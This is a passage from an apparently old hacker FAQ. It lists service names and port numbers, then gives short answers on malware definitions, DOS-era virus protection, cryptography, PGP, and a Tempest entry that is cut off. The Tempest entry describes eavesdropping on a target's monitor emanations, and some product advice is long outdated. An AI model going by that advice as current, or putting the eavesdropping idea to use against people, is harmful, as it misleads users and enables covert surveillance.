  1800. objcall          94/tcp    Tivoli Object Dispatcher
  1801. objcall          94/udp    Tivoli Object Dispatcher
  1802. supdup           95/tcp    SUPDUP
  1803. supdup           95/udp    SUPDUP
  1804. dixie            96/tcp    DIXIE Protocol Specification
  1805. dixie            96/udp    DIXIE Protocol Specification
  1806. swift-rvf        97/tcp    Swift Remote Vitural File Protocol
  1807. swift-rvf        97/udp    Swift Remote Vitural File Protocol
  1808. tacnews          98/tcp    TAC News
  1809. tacnews          98/udp    TAC News
  1810. metagram         99/tcp    Metagram Relay
  1811. metagram         99/udp    Metagram Relay
  1812. newacct         100/tcp    [unauthorized use]
  1813. hostname        101/tcp    NIC Host Name Server
  1814. hostname        101/udp    NIC Host Name Server
  1815. iso-tsap        102/tcp    ISO-TSAP
  1816. iso-tsap        102/udp    ISO-TSAP
  1817. gppitnp         103/tcp    Genesis Point-to-Point Trans Net
  1818. gppitnp         103/udp    Genesis Point-to-Point Trans Net
  1819. acr-nema        104/tcp    ACR-NEMA Digital Imag. & Comm. 300
  1820. acr-nema        104/udp    ACR-NEMA Digital Imag. & Comm. 300
  1821. csnet-ns        105/tcp    Mailbox Name Nameserver
  1822. csnet-ns        105/udp    Mailbox Name Nameserver
  1823. 3com-tsmux      106/tcp    3COM-TSMUX
  1824. 3com-tsmux      106/udp    3COM-TSMUX
  1825. rtelnet         107/tcp    Remote Telnet Service
  1826. rtelnet         107/udp    Remote Telnet Service
  1827. snagas          108/tcp    SNA Gateway Access Server
  1828. snagas          108/udp    SNA Gateway Access Server
  1829. pop2            109/tcp    Post Office Protocol - Version 2
  1830. pop2            109/udp    Post Office Protocol - Version 2
  1831. pop3            110/tcp    Post Office Protocol - Version 3
  1832. pop3            110/udp    Post Office Protocol - Version 3
  1833. sunrpc          111/tcp    SUN Remote Procedure Call
  1834. sunrpc          111/udp    SUN Remote Procedure Call
  1835. mcidas          112/tcp    McIDAS Data Transmission Protocol
  1836. mcidas          112/udp    McIDAS Data Transmission Protocol
  1837. auth            113/tcp    Authentication Service
  1838. auth            113/udp    Authentication Service
  1839. audionews       114/tcp    Audio News Multicast
  1840. audionews       114/udp    Audio News Multicast
  1841. sftp            115/tcp    Simple File Transfer Protocol
  1842. sftp            115/udp    Simple File Transfer Protocol
  1843. ansanotify      116/tcp    ANSA REX Notify
  1844. ansanotify      116/udp    ANSA REX Notify
  1845. uucp-path       117/tcp    UUCP Path Service
  1846. uucp-path       117/udp    UUCP Path Service
  1847. sqlserv         118/tcp    SQL Services
  1848. sqlserv         118/udp    SQL Services
  1849. nntp            119/tcp    Network News Transfer Protocol
  1850. nntp            119/udp    Network News Transfer Protocol
  1851. cfdptkt         120/tcp    CFDPTKT
  1852. cfdptkt         120/udp    CFDPTKT
  1853. erpc            121/tcp    Encore Expedited Remote Pro.Call
  1854. erpc            121/udp    Encore Expedited Remote Pro.Call
  1855. smakynet        122/tcp    SMAKYNET
  1856. smakynet        122/udp    SMAKYNET
  1857. ntp             123/tcp    Network Time Protocol
  1858. ntp             123/udp    Network Time Protocol
  1859. ansatrader      124/tcp    ANSA REX Trader
  1860. ansatrader      124/udp    ANSA REX Trader
  1861. locus-map       125/tcp    Locus PC-Interface Net Map Ser
  1862. locus-map       125/udp    Locus PC-Interface Net Map Ser
  1863. unitary         126/tcp    Unisys Unitary Login
  1864. unitary         126/udp    Unisys Unitary Login
  1865. locus-con       127/tcp    Locus PC-Interface Conn Server
  1866. locus-con       127/udp    Locus PC-Interface Conn Server
  1867. gss-xlicen      128/tcp    GSS X License Verification
  1868. gss-xlicen      128/udp    GSS X License Verification
  1869. pwdgen          129/tcp    Password Generator Protocol
  1870. pwdgen          129/udp    Password Generator Protocol
  1871. cisco-fna       130/tcp    cisco FNATIVE
  1872. cisco-fna       130/udp    cisco FNATIVE
  1873. cisco-tna       131/tcp    cisco TNATIVE
  1874. cisco-tna       131/udp    cisco TNATIVE
  1875. cisco-sys       132/tcp    cisco SYSMAINT
  1876. cisco-sys       132/udp    cisco SYSMAINT
  1877. statsrv         133/tcp    Statistics Service
  1878. statsrv         133/udp    Statistics Service
  1879. ingres-net      134/tcp    INGRES-NET Service
  1880. ingres-net      134/udp    INGRES-NET Service
  1881. loc-srv         135/tcp    Location Service
  1882. loc-srv         135/udp    Location Service
  1883. profile         136/tcp    PROFILE Naming System
  1884. profile         136/udp    PROFILE Naming System
  1885. netbios-ns      137/tcp    NETBIOS Name Service
  1886. netbios-ns      137/udp    NETBIOS Name Service
  1887. netbios-dgm     138/tcp    NETBIOS Datagram Service
  1888. netbios-dgm     138/udp    NETBIOS Datagram Service
  1889. netbios-ssn     139/tcp    NETBIOS Session Service
  1890. netbios-ssn     139/udp    NETBIOS Session Service
  1891. emfis-data      140/tcp    EMFIS Data Service
  1892. emfis-data      140/udp    EMFIS Data Service
  1893. emfis-cntl      141/tcp    EMFIS Control Service
  1894. emfis-cntl      141/udp    EMFIS Control Service
  1895. bl-idm          142/tcp    Britton-Lee IDM
  1896. bl-idm          142/udp    Britton-Lee IDM
  1897. imap2           143/tcp    Interim Mail Access Protocol v2
  1898. imap2           143/udp    Interim Mail Access Protocol v2
  1899. news            144/tcp    NewS
  1900. news            144/udp    NewS
  1901. uaac            145/tcp    UAAC Protocol
  1902. uaac            145/udp    UAAC Protocol
  1903. iso-tp0         146/tcp    ISO-IP0
  1904. iso-tp0         146/udp    ISO-IP0
  1905. iso-ip          147/tcp    ISO-IP
  1906. iso-ip          147/udp    ISO-IP
  1907. cronus          148/tcp    CRONUS-SUPPORT
  1908. cronus          148/udp    CRONUS-SUPPORT
  1909. aed-512         149/tcp    AED 512 Emulation Service
  1910. aed-512         149/udp    AED 512 Emulation Service
  1911. sql-net         150/tcp    SQL-NET
  1912. sql-net         150/udp    SQL-NET
  1913. hems            151/tcp    HEMS
  1914. hems            151/udp    HEMS
  1915. bftp            152/tcp    Background File Transfer Program
  1916. bftp            152/udp    Background File Transfer Program
  1917. sgmp            153/tcp    SGMP
  1918. sgmp            153/udp    SGMP
  1919. netsc-prod      154/tcp    NETSC
  1920. netsc-prod      154/udp    NETSC
  1921. netsc-dev       155/tcp    NETSC
  1922. netsc-dev       155/udp    NETSC
  1923. sqlsrv          156/tcp    SQL Service
  1924. sqlsrv          156/udp    SQL Service
  1925. knet-cmp        157/tcp    KNET/VM Command/Message Protocol
  1926. knet-cmp        157/udp    KNET/VM Command/Message Protocol
  1927. pcmail-srv      158/tcp    PCMail Server
  1928. pcmail-srv      158/udp    PCMail Server
  1929. nss-routing     159/tcp   NSS-Routing
  1930. nss-routing     159/udp   NSS-Routing
  1931. sgmp-traps      160/tcp    SGMP-TRAPS
  1932. sgmp-traps      160/udp    SGMP-TRAPS
  1933. snmp            161/tcp    SNMP
  1934. snmp            161/udp    SNMP
  1935. snmptrap        162/tcp    SNMPTRAP
  1936. snmptrap        162/udp    SNMPTRAP
  1937. cmip-man        163/tcp    CMIP/TCP Manager
  1938. cmip-man        163/udp    CMIP/TCP Manager
  1939. cmip-agent      164/tcp    CMIP/TCP Agent
  1940. smip-agent      164/udp    CMIP/TCP Agent
  1941. xns-courier     165/tcp   Xerox
  1942. xns-courier     165/udp   Xerox
  1943. s-net           166/tcp    Sirius Systems
  1944. s-net           166/udp    Sirius Systems
  1945. namp            167/tcp    NAMP
  1946. namp            167/udp    NAMP
  1947. rsvd            168/tcp    RSVD
  1948. rsvd            168/udp    RSVD
  1949. send            169/tcp    SEND
  1950. send            169/udp    SEND
  1951. print-srv       170/tcp    Network PostScript
  1952. print-srv       170/udp    Network PostScript
  1953. multiplex       171/tcp    Network Innovations Multiplex
  1954. multiplex       171/udp    Network Innovations Multiplex
  1955. cl/1            172/tcp    Network Innovations CL/1
  1956. cl/1            172/udp    Network Innovations CL/1
  1957. xyplex-mux      173/tcp    Xyplex
  1958. xyplex-mux      173/udp    Xyplex
  1959. mailq           174/tcp    MAILQ
  1960. mailq           174/udp    MAILQ
  1961. vmnet           175/tcp    VMNET
  1962. vmnet           175/udp    VMNET
  1963. genrad-mux      176/tcp    GENRAD-MUX
  1964. genrad-mux      176/udp    GENRAD-MUX
  1965. xdmcp           177/tcp    X Display Manager Control Protocol
  1966. xdmcp           177/udp    X Display Manager Control Protocol
  1967. nextstep        178/tcp    NextStep Window Server
  1968. NextStep        178/udp    NextStep Window Server
  1969. bgp             179/tcp    Border Gateway Protocol
  1970. bgp             179/udp    Border Gateway Protocol
  1971. ris             180/tcp    Intergraph
  1972. ris             180/udp    Intergraph
  1973. unify           181/tcp    Unify
  1974. unify           181/udp    Unify
  1975. audit           182/tcp    Unisys Audit SITP
  1976. audit           182/udp    Unisys Audit SITP
  1977. ocbinder        183/tcp    OCBinder
  1978. ocbinder        183/udp    OCBinder
  1979. ocserver        184/tcp    OCServer
  1980. ocserver        184/udp    OCServer
  1981. remote-kis      185/tcp    Remote-KIS
  1982. remote-kis      185/udp    Remote-KIS
  1983. kis             186/tcp    KIS Protocol
  1984. kis             186/udp    KIS Protocol
  1985. aci             187/tcp    Application Communication Interface
  1986. aci             187/udp    Application Communication Interface
  1987. mumps           188/tcp    Plus Five's MUMPS
  1988. mumps           188/udp    Plus Five's MUMPS
  1989. qft             189/tcp    Queued File Transport
  1990. qft             189/udp    Queued File Transport
  1991. gacp            190/tcp    Gateway Access Control Protocol
  1992. cacp            190/udp    Gateway Access Control Protocol
  1993. prospero        191/tcp    Prospero
  1994. prospero        191/udp    Prospero
  1995. osu-nms         192/tcp    OSU Network Monitoring System
  1996. osu-nms         192/udp    OSU Network Monitoring System
  1997. srmp            193/tcp    Spider Remote Monitoring Protocol
  1998. srmp            193/udp    Spider Remote Monitoring Protocol
  1999. irc             194/tcp    Internet Relay Chat Protocol
  2000. irc             194/udp    Internet Relay Chat Protocol
  2001. dn6-nlm-aud     195/tcp    DNSIX Network Level Module Audit
  2002. dn6-nlm-aud     195/udp    DNSIX Network Level Module Audit
  2003. dn6-smm-red     196/tcp    DNSIX Session Mgt Module Audit Redir
  2004. dn6-smm-red     196/udp    DNSIX Session Mgt Module Audit Redir
  2005. dls             197/tcp    Directory Location Service
  2006. dls             197/udp    Directory Location Service
  2007. dls-mon         198/tcp    Directory Location Service Monitor
  2008. dls-mon         198/udp    Directory Location Service Monitor
  2009. smux            199/tcp    SMUX
  2010. smux            199/udp    SMUX
  2011. src             200/tcp    IBM System Resource Controller
  2012. src             200/udp    IBM System Resource Controller
  2013. at-rtmp         201/tcp    AppleTalk Routing Maintenance
  2014. at-rtmp         201/udp    AppleTalk Routing Maintenance
  2015. at-nbp          202/tcp    AppleTalk Name Binding
  2016. at-nbp          202/udp    AppleTalk Name Binding
  2017. at-3            203/tcp    AppleTalk Unused
  2018. at-3            203/udp    AppleTalk Unused
  2019. at-echo         204/tcp    AppleTalk Echo
  2020. at-echo         204/udp    AppleTalk Echo
  2021. at-5            205/tcp    AppleTalk Unused
  2022. at-5            205/udp    AppleTalk Unused
  2023. at-zis          206/tcp    AppleTalk Zone Information
  2024. at-zis          206/udp    AppleTalk Zone Information
  2025. at-7            207/tcp    AppleTalk Unused
  2026. at-7            207/udp    AppleTalk Unused
  2027. at-8            208/tcp    AppleTalk Unused
  2028. at-8            208/udp    AppleTalk Unused
  2029. tam             209/tcp    Trivial Authenticated Mail Protocol
  2030. tam             209/udp    Trivial Authenticated Mail Protocol
  2031. z39.50          210/tcp    ANSI Z39.50
  2032. z39.50          210/udp    ANSI Z39.50
  2033. 914c/g          211/tcp    Texas Instruments 914C/G Terminal
  2034. 914c/g          211/udp    Texas Instruments 914C/G Terminal
  2035. anet            212/tcp    ATEXSSTR
  2036. anet            212/udp    ATEXSSTR
  2037. ipx             213/tcp    IPX
  2038. ipx             213/udp    IPX
  2039. vmpwscs         214/tcp    VM PWSCS
  2040. vmpwscs         214/udp    VM PWSCS
  2041. softpc          215/tcp    Insignia Solutions
  2042. softpc          215/udp    Insignia Solutions
  2043. atls            216/tcp    Access Technology License Server
  2044. atls            216/udp    Access Technology License Server
  2045. dbase           217/tcp    dBASE Unix
  2046. dbase           217/udp    dBASE Unix
  2047. mpp             218/tcp    Netix Message Posting Protocol
  2048. mpp             218/udp    Netix Message Posting Protocol
  2049. uarps           219/tcp    Unisys ARPs
  2050. uarps           219/udp    Unisys ARPs
  2051. imap3           220/tcp    Interactive Mail Access Protocol v3
  2052. imap3           220/udp    Interactive Mail Access Protocol v3
  2053. fln-spx         221/tcp    Berkeley rlogind with SPX auth
  2054. fln-spx         221/udp    Berkeley rlogind with SPX auth
  2055. fsh-spx         222/tcp    Berkeley rshd with SPX auth
  2056. fsh-spx         222/udp    Berkeley rshd with SPX auth
  2057. cdc             223/tcp    Certificate Distribution Center
  2058. cdc             223/udp    Certificate Distribution Center
  2059.         224-241    Reserved
  2060. sur-meas        243/tcp    Survey Measurement
  2061. sur-meas        243/udp    Survey Measurement
  2062. link            245/tcp    LINK
  2063. link            245/udp    LINK
  2064. dsp3270         246/tcp    Display Systems Protocol
  2065. dsp3270         246/udp    Display Systems Protocol
  2066.         247-255    Reserved
  2067. pawserv         345/tcp    Perf Analysis Workbench
  2068. pawserv         345/udp    Perf Analysis Workbench
  2069. zserv           346/tcp    Zebra server
  2070. zserv           346/udp    Zebra server
  2071. fatserv         347/tcp    Fatmen Server
  2072. fatserv         347/udp    Fatmen Server
  2073. clearcase       371/tcp    Clearcase
  2074. clearcase       371/udp    Clearcase
  2075. ulistserv       372/tcp    Unix Listserv
  2076. ulistserv       372/udp    Unix Listserv
  2077. legent-1        373/tcp    Legent Corporation
  2078. legent-1        373/udp    Legent Corporation
  2079. legent-2        374/tcp    Legent Corporation
  2080. legent-2        374/udp    Legent Corporation
  2081. exec            512/tcp    remote process execution;
  2082.                authentication performed using
  2083.                passwords and UNIX login names
  2084. biff            512/udp    used by mail system to notify users
  2085.                of new mail received; currently
  2086.                receives messages only from
  2087.                processes on the same machine
  2088. login           513/tcp    remote login a la telnet;
  2089.                automatic authentication performed
  2090.                based on priviledged port numbers
  2091.                and distributed data bases which
  2092.                identify "authentication domains"
  2093. who             513/udp    maintains data bases showing who's
  2094.                logged in to machines on a local
  2095.                net and the load average of the
  2096.                machine
  2097. cmd             514/tcp    like exec, but automatic
  2098.                authentication is performed as for
  2099.                login server
  2100. syslog          514/udp
  2101. printer         515/tcp    spooler
  2102. printer         515/udp    spooler
  2103. talk            517/tcp    like tenex link, but across
  2104.                machine - unfortunately, doesn't
  2105.                use link protocol (this is actually
  2106.                just a rendezvous port from which a
  2107.                tcp connection is established)
  2108. talk            517/udp    like tenex link, but across
  2109.                machine - unfortunately, doesn't
  2110.                use link protocol (this is actually
  2111.                just a rendezvous port from which a
  2112.                tcp connection is established)
  2113. ntalk           518/tcp
  2114. ntalk           518/udp
  2115. utime           519/tcp    unixtime
  2116. utime           519/udp    unixtime
  2117. efs             520/tcp    extended file name server
  2118. router          520/udp    local routing process (on site);
  2119.                uses variant of Xerox NS routing
  2120.                information protocol
  2121. timed           525/tcp    timeserver
  2122. timed           525/udp    timeserver
  2123. tempo           526/tcp    newdate
  2124. tempo           526/udp    newdate
  2125. courier         530/tcp    rpc
  2126. courier         530/udp    rpc
  2127. conference      531/tcp    chat
  2128. conference      531/udp    chat
  2129. netnews         532/tcp    readnews
  2130. netnews         532/udp    readnews
  2131. netwall         533/tcp    for emergency broadcasts
  2132. netwall         533/udp    for emergency broadcasts
  2133. uucp            540/tcp    uucpd
  2134. uucp            540/udp    uucpd
  2135. klogin          543/tcp
  2136. klogin          543/udp
  2137. kshell          544/tcp    krcmd
  2138. kshell          544/udp    krcmd
  2139. new-rwho        550/tcp    new-who
  2140. new-rwho        550/udp    new-who
  2141. dsf             555/tcp
  2142. dsf             555/udp
  2143. remotefs        556/tcp    rfs server
  2144. remotefs        556/udp    rfs server
  2145. rmonitor        560/tcp    rmonitord
  2146. rmonitor        560/udp    rmonitord
  2147. monitor         561/tcp
  2148. monitor         561/udp
  2149. chshell         562/tcp    chcmd
  2150. chshell         562/udp    chcmd
  2151. 9pfs            564/tcp    plan 9 file service
  2152. 9pfs            564/udp    plan 9 file service
  2153. whoami          565/tcp    whoami
  2154. whoami          565/udp    whoami
  2155. meter           570/tcp    demon
  2156. meter           570/udp    demon
  2157. meter           571/tcp    udemon
  2158. meter           571/udp    udemon
  2159. ipcserver       600/tcp    Sun IPC server
  2160. ipcserver       600/udp    Sun IPC server
  2161. nqs             607/tcp    nqs
  2162. nqs             607/udp    nqs
  2163. mdqs            666/tcp
  2164. mdqs            666/udp
  2165. elcsd           704/tcp    errlog copy/server daemon
  2166. elcsd           704/udp    errlog copy/server daemon
  2167. netcp           740/tcp    NETscout Control Protocol
  2168. netcp           740/udp    NETscout Control Protocol
  2169. netgw           741/tcp    netGW
  2170. netgw           741/udp    netGW
  2171. netrcs          742/tcp    Network based Rev. Cont. Sys.
  2172. netrcs          742/udp    Network based Rev. Cont. Sys.
  2173. flexlm          744/tcp    Flexible License Manager
  2174. flexlm          744/udp    Flexible License Manager
  2175. fujitsu-dev     747/tcp    Fujitsu Device Control
  2176. fujitsu-dev     747/udp    Fujitsu Device Control
  2177. ris-cm          748/tcp    Russell Info Sci Calendar Manager
  2178. ris-cm          748/udp    Russell Info Sci Calendar Manager
  2179. kerberos-adm    749/tcp    kerberos administration
  2180. kerberos-adm    749/udp    kerberos administration
  2181. rfile           750/tcp
  2182. loadav          750/udp
  2183. pump            751/tcp
  2184. pump            751/udp
  2185. qrh             752/tcp
  2186. qrh             752/udp
  2187. rrh             753/tcp
  2188. rrh             753/udp
  2189. tell            754/tcp     send
  2190. tell            754/udp     send
  2191. nlogin          758/tcp
  2192. nlogin          758/udp
  2193. con             759/tcp
  2194. con             759/udp
  2195. ns              760/tcp
  2196. ns              760/udp
  2197. rxe             761/tcp
  2198. rxe             761/udp
  2199. quotad          762/tcp
  2200. quotad          762/udp
  2201. cycleserv       763/tcp
  2202. cycleserv       763/udp
  2203. omserv          764/tcp
  2204. omserv          764/udp
  2205. webster         765/tcp
  2206. webster         765/udp
  2207. phonebook       767/tcp    phone
  2208. phonebook       767/udp    phone
  2209. vid             769/tcp
  2210. vid             769/udp
  2211. cadlock         770/tcp
  2212. cadlock         770/udp
  2213. rtip            771/tcp
  2214. rtip            771/udp
  2215. cycleserv2      772/tcp
  2216. cycleserv2      772/udp
  2217. submit          773/tcp
  2218. notify          773/udp
  2219. rpasswd         774/tcp
  2220. acmaint_dbd     774/udp
  2221. entomb          775/tcp
  2222. acmaint_transd  775/udp
  2223. wpages          776/tcp
  2224. wpages          776/udp
  2225. wpgs            780/tcp
  2226. wpgs            780/udp
  2227. hp-collector    781/tcp        hp performance data collector
  2228. hp-collector    781/udp        hp performance data collector
  2229. hp-managed-node 782/tcp        hp performance data managed node
  2230. hp-managed-node 782/udp        hp performance data managed node
  2231. hp-alarm-mgr    783/tcp        hp performance data alarm manager
  2232. hp-alarm-mgr    783/udp        hp performance data alarm manager
  2233. mdbs_daemon     800/tcp
  2234. mdbs_daemon     800/udp
  2235. device          801/tcp
  2236. device          801/udp
  2237. xtreelic        996/tcp        XTREE License Server
  2238. xtreelic        996/udp        XTREE License Server
  2239. maitrd          997/tcp
  2240. maitrd          997/udp
  2241. busboy          998/tcp
  2242. puparp          998/udp
  2243. garcon          999/tcp
  2244. applix          999/udp        Applix ac
  2245. puprouter       999/tcp
  2246. puprouter       999/udp
  2247. cadlock         1000/tcp
  2248. ock             1000/udp
  2249. blackjack       1025/tcp   network blackjack
  2250. blackjack       1025/udp   network blackjack
  2251. hermes          1248/tcp
  2252. hermes          1248/udp
  2253. bbn-mmc         1347/tcp   multi media conferencing
  2254. bbn-mmc         1347/udp   multi media conferencing
  2255. bbn-mmx         1348/tcp   multi media conferencing
  2256. bbn-mmx         1348/udp   multi media conferencing
  2257. sbook           1349/tcp   Registration Network Protocol
  2258. sbook           1349/udp   Registration Network Protocol
  2259. editbench       1350/tcp   Registration Network Protocol
  2260. editbench       1350/udp   Registration Network Protocol
  2261. equationbuilder 1351/tcp   Digital Tool Works (MIT)
  2262. equationbuilder 1351/udp   Digital Tool Works (MIT)
  2263. lotusnote       1352/tcp   Lotus Note
  2264. lotusnote       1352/udp   Lotus Note
  2265. ingreslock      1524/tcp   ingres
  2266. ingreslock      1524/udp   ingres
  2267. orasrv          1525/tcp   oracle
  2268. orasrv          1525/udp   oracle
  2269. prospero-np     1525/tcp   prospero non-privileged
  2270. prospero-np     1525/udp   prospero non-privileged
  2271. tlisrv          1527/tcp   oracle
  2272. tlisrv          1527/udp   oracle
  2273. coauthor        1529/tcp   oracle
  2274. coauthor        1529/udp   oracle
  2275. issd            1600/tcp
  2276. issd            1600/udp
  2277. nkd             1650/tcp
  2278. nkd             1650/udp
  2279. callbook        2000/tcp
  2280. callbook        2000/udp
  2281. dc              2001/tcp
  2282. wizard          2001/udp    curry
  2283. globe           2002/tcp
  2284. globe           2002/udp
  2285. mailbox         2004/tcp
  2286. emce            2004/udp    CCWS mm conf
  2287. berknet         2005/tcp
  2288. oracle          2005/udp
  2289. invokator       2006/tcp
  2290. raid-cc         2006/udp    raid
  2291. dectalk         2007/tcp
  2292. raid-am         2007/udp
  2293. conf            2008/tcp
  2294. terminaldb      2008/udp
  2295. news            2009/tcp
  2296. whosockami      2009/udp
  2297. search          2010/tcp
  2298. pipe_server     2010/udp
  2299. raid-cc         2011/tcp    raid
  2300. servserv        2011/udp
  2301. ttyinfo         2012/tcp
  2302. raid-ac         2012/udp
  2303. raid-am         2013/tcp
  2304. raid-cd         2013/udp
  2305. troff           2014/tcp
  2306. raid-sf         2014/udp
  2307. cypress         2015/tcp
  2308. raid-cs         2015/udp
  2309. bootserver      2016/tcp
  2310. bootserver      2016/udp
  2311. cypress-stat    2017/tcp
  2312. bootclient      2017/udp
  2313. terminaldb      2018/tcp
  2314. rellpack        2018/udp
  2315. whosockami      2019/tcp
  2316. about           2019/udp
  2317. xinupageserver  2020/tcp
  2318. xinupageserver  2020/udp
  2319. servexec        2021/tcp
  2320. xinuexpansion1  2021/udp
  2321. down            2022/tcp
  2322. xinuexpansion2  2022/udp
  2323. xinuexpansion3  2023/tcp
  2324. xinuexpansion3  2023/udp
  2325. xinuexpansion4  2024/tcp
  2326. xinuexpansion4  2024/udp
  2327. ellpack         2025/tcp
  2328. xribs           2025/udp
  2329. scrabble        2026/tcp
  2330. scrabble        2026/udp
  2331. shadowserver    2027/tcp
  2332. shadowserver    2027/udp
  2333. submitserver    2028/tcp
  2334. submitserver    2028/udp
  2335. device2         2030/tcp
  2336. device2         2030/udp
  2337. blackboard      2032/tcp
  2338. blackboard      2032/udp
  2339. glogger         2033/tcp
  2340. glogger         2033/udp
  2341. scoremgr        2034/tcp
  2342. scoremgr        2034/udp
  2343. imsldoc         2035/tcp
  2344. imsldoc         2035/udp
  2345. objectmanager   2038/tcp
  2346. objectmanager   2038/udp
  2347. lam             2040/tcp
  2348. lam             2040/udp
  2349. interbase       2041/tcp
  2350. interbase       2041/udp
  2351. isis            2042/tcp
  2352. isis            2042/udp
  2353. isis-bcast      2043/tcp
  2354. isis-bcast      2043/udp
  2355. rimsl           2044/tcp
  2356. rimsl           2044/udp
  2357. cdfunc          2045/tcp
  2358. cdfunc          2045/udp
  2359. sdfunc          2046/tcp
  2360. sdfunc          2046/udp
  2361. dls             2047/tcp
  2362. dls             2047/udp
  2363. dls-monitor     2048/tcp
  2364. dls-monitor     2048/udp
  2365. shilp           2049/tcp
  2366. shilp           2049/udp
  2367. www-dev         2784/tcp   world wide web - development
  2368. www-dev         2784/udp   world wide web - development
  2369. NSWS            3049/tcp
  2370. NSWS            3049/ddddp
  2371. rfa             4672/tcp   remote file access server
  2372. rfa             4672/udp   remote file access server
  2373. commplex-main   5000/tcp
  2374. commplex-main   5000/udp
  2375. commplex-link   5001/tcp
  2376. commplex-link   5001/udp
  2377. rfe             5002/tcp   radio free ethernet
  2378. rfe             5002/udp   radio free ethernet
  2379. rmonitor_secure 5145/tcp
  2380. rmonitor_secure 5145/udp
  2381. padl2sim        5236/tcp
  2382. padl2sim        5236/udp
  2383. sub-process     6111/tcp   HP SoftBench Sub-Process Control
  2384. sub-process     6111/udp   HP SoftBench Sub-Process Control
  2385. xdsxdm          6558/udp
  2386. xdsxdm          6558/tcp
  2387. afs3-fileserver 7000/tcp   file server itself
  2388. afs3-fileserver 7000/udp   file server itself
  2389. afs3-callback   7001/tcp   callbacks to cache managers
  2390. afs3-callback   7001/udp   callbacks to cache managers
  2391. afs3-prserver   7002/tcp   users & groups database
  2392. afs3-prserver   7002/udp   users & groups database
  2393. afs3-vlserver   7003/tcp   volume location database
  2394. afs3-vlserver   7003/udp   volume location database
  2395. afs3-kaserver   7004/tcp   AFS/Kerberos authentication service
  2396. afs3-kaserver   7004/udp   AFS/Kerberos authentication service
  2397. afs3-volser     7005/tcp   volume managment server
  2398. afs3-volser     7005/udp   volume managment server
  2399. afs3-errors     7006/tcp   error interpretation service
  2400. afs3-errors     7006/udp   error interpretation service
  2401. afs3-bos        7007/tcp   basic overseer process
  2402. afs3-bos        7007/udp   basic overseer process
  2403. afs3-update     7008/tcp   server-to-server updater
  2404. afs3-update     7008/udp   server-to-server updater
  2405. afs3-rmtsys     7009/tcp   remote cache manager service
  2406. afs3-rmtsys     7009/udp   remote cache manager service
  2407. man             9535/tcp
  2408. man             9535/udp
  2409. isode-dua       17007/tcp
  2410. isode-dua       17007/udp
  2411.  
  2412.  
  2413. 23. What is a trojan/worm/virus/logic bomb?
  2414.  
  2415. This FAQ answer is excerpted from: Computer Security Basics
  2416.                    by Deborah Russell
  2417.                    and G.T. Gengemi Sr.
  2418.  
  2419. Trojan:     An independent program that appears to perform a useful
  2420.         function but that hides another unauthorized program
  2421.         inside it.  When an authorized user performs the apparent
  2422.         function, the trojan horse performs the unauthorized
  2423.         function as well (often usurping the privileges of the
  2424.         user).
  2425.  
  2426. Virus:      A code fragment (not an independent program) that
  2427.         reproduces by attaching to another program.  It may damage
  2428.         data directly, or it may degrade system performance by
  2429.         taking over system resources which are then not available
  2430.         to authorized users.
  2431.  
  2432. Worm:       An independent program that reproduces by copying itself
  2433.         from one system to another, usually over a network.  Like
  2434.         a virus, a worm may damage data directly, or it may
  2435.         degrade system performance by tying up system resources and
  2436.         even shutting down a network.
  2437.  
  2438. Logic Bomb: A method for releasing a system attack of some kind.  It
  2439.         is triggered when a particular condition (e.g., a certain
  2440.         date or system operation) occurs.
  2441.  
  2442.  
  2443. 24. How can I protect myself from virii and such?
  2444.  
  2445. Always write protect your floppy disks when you are not purposefully
  2446. writing to them.
  2447.  
  2448. Use ATTRIB to make all of your EXE and COM files read only.  This will
  2449. protect you from many poorly written viruses.
  2450.  
  2451. Scan any software that you receive with a recent copy of a good virus
  2452. scanner.  The best virus scanner currently available for DOS is F-Prot
  2453. by Fridrik Skulason.  The current version is FP-212C.  It is best to
  2454. use more than one virus scanner.  That will decrease your chances of
  2455. missing a virus.
  2456.  
  2457. Backup regularly, and keep several generations of backups on hand.
  2458. If you always backup over your last backup, you may find yourself with
  2459. an infected backup tape.
  2460.  
  2461.  
  2462. 25. What is Cryptoxxxxxxx?
  2463.  
  2464. This FAQ answer is excerpted from: Computer Security Basics
  2465.                    by Deborah Russell
  2466.                    and G.T. Gengemi Sr.
  2467.  
  2468. A message is called either plaintext or cleartext.  The process of
  2469. disguising a message in such a way as to hide its substance is called
  2470. encryption.  An encrypted message is called ciphertext.  The process
  2471. of turning ciphertext back into plaintext is called decryption.
  2472.  
  2473. The art and science of keeping messages secure is called cryptography,
  2474. and it is practiced by cryptographers.  Cryptanalysts are
  2475. practitioners of cryptanalysis, the art and science of breaking
  2476. ciphertext, i.e. seeing through the disguise.  The branch of
  2477. mathematics embodying both cryptography and cryptanalysis is called
  2478. cryptology, and it's practitioners are called cryptologists.
  2479.  
  2480.  
  2481. 26. What is PGP?
  2482.  
  2483. This FAQ answer is excerpted from: PGP(tm) User's Guide
  2484.                    Volume I: Essential Topics
  2485.                    by Philip Zimmermann
  2486.  
  2487. PGP(tm) uses public-key encryption to protect E-mail and data files.
  2488. Communicate securely with people you've never met, with no secure
  2489. channels needed for prior exchange of keys.  PGP is well featured and
  2490. fast, with sophisticated key management, digital signatures, data
  2491. compression, and good ergonomic design.
  2492.  
  2493. Pretty Good(tm) Privacy (PGP), from Phil's Pretty Good Software, is a
  2494. high security cryptographic software application for MS-DOS, Unix,
  2495. VAX/VMS, and other computers.  PGP allows people to exchange files or
  2496. messages with privacy, authentication, and convenience.  Privacy means
  2497. that only those intended to receive a message can read it.
  2498. Authentication means that messages that appear to be from a particular
  2499. person can only have originated from that person. Convenience means
  2500. that privacy and authentication are provided without the hassles of
  2501. managing keys associated with conventional cryptographic software.  No
  2502. secure channels are needed to exchange keys between users, which makes
  2503. PGP much easier to use.  This is because PGP is based on a powerful
  2504. new technology called "public key" cryptography.
  2505.  
  2506. PGP combines the convenience of the Rivest-Shamir-Adleman (RSA)
  2507. public key cryptosystem with the speed of conventional cryptography,
  2508. message digests for digital signatures, data compression before
  2509. encryption, good ergonomic design, and sophisticated key management. 
  2510. And PGP performs the public-key functions faster than most other
  2511. software implementations.  PGP is public key cryptography for the
  2512. masses.
  2513.  
  2514.  
  2515. 27. What is Tempest?
  2516.  
  2517. Computers and other electronic equipment release interference to their
  2518. surrounding environment.  You may observe this by placing two video
  2519. monitors close together.  The pictures will behave erratically until
  2520. you space them apart.
  2521.  
  2522. Although most of the time these emissions are simply annoyances, they
  2523. can sometimes be very helpful.  Suppose we wanted to see what project
  2524. a target was working on.  We could sit in a van outside her office and
  2525. use sensitive electronic equipment to attempt to pick up and decipher
  2526. the emanations from her video monitor.
  2527.  
  2528. Our competitor, however, could shield the emanations from her
